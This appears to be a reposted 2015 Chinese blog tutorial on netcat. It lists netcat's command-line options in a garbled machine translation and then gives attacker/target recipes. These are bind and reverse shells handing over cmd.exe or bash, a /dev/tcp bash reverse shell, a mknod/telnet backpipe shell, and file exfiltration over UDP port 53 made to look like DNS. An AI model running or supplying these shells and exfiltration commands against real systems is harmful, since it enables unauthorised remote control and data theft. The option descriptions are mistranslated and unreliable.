码迷,mamicode.com
首页 > Web开发 > 详细

netcat的用法

时间:2015-05-02 18:21:33      阅读:322      评论:0      收藏:0      [点我收藏+]

标签:netcat用法

连接到某处:nc [-options] hostname port[s] [ports] ...

侦听入站:nc -l -p port [-options] [hostname] [port]

options:

-d 分离形式控制台后台模式

-c,--close从标准输入的EOF密切联系

  -e,--exec = PROGRAM程序后,exec的连接

  -g,--gateway = LIST源路由跳点[S],多达8个

  -G,--pointer = NUM源路由指针:4,8,12,...

  -h,--help显示帮助并退出

  对于线发送-i,--interval = SECS延迟间隔,端口扫描

  -l,--listen监听模式,用于入站连接

  -L,--tunnel =地址:端口转发本地端口远程地址

  -n,--dont,解决纯数字IP地址,不DNS

  -o,--output = FILE输出hexdump都通信,以文件(-x暗示)

  -p,--local端口= NUM本地端口号

  -r,--randomize随机本地和远程端口

  -s,--source =地址本地源地址(IP或主机名)

  -t,--tcp TCP模式(默认)

  -T,使用Telnet协商--telnet回答

  -u,--udp UDP模式

  -v,--verbose冗长(使用两次,更详细)

  -V,--version输出版本信息并退出

  -x,--hexdump hexdump都传入和传出流量

  -w,--wait = SECS超时连接和最后读网

  -z,--zero零I / O模式(用于扫描)

攻击机建立服务器等目标机送CMD

攻击机:kali

nc -l -p 3333

 

目标机:XP

nc -d 攻击机IP -e -cmd.exe

 

 

 

目标机建立服务器等攻击机去联

目标机:

nc -d -l -p 3333 -e cmd.exe

 

攻击机:

nc 目标机IP 3333

 

 

netcat传文件(先要攻击机建立服务端收取)UDP53号端口是DNS

目标机:nc -u 192.168.1.105 53 < 123.txt


这里192.168.1.105是攻击机的

 

攻击机:

nc -u -l -p 53 > 456.txt

 

以及

目标机器:nc -v -w 30 -p 3333 -l < 123.txt(-w是延迟,超过30秒断开,-l进入监听)

攻击机器:nc -v -w 3 192.168.1.108 3333 > 456.txt(192.168.1.108为目标机)


linux建立服务送shellwindows

攻击机:nc -l -n -vv -p 8080

                

目标机器:/bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1

                     mknod backpipe p && telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe


本文出自 “网络安全爱好者” 博客,请务必保留此出处http://blackflag.blog.51cto.com/9679269/1641266

netcat的用法

标签:netcat用法

原文地址:http://blackflag.blog.51cto.com/9679269/1641266

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!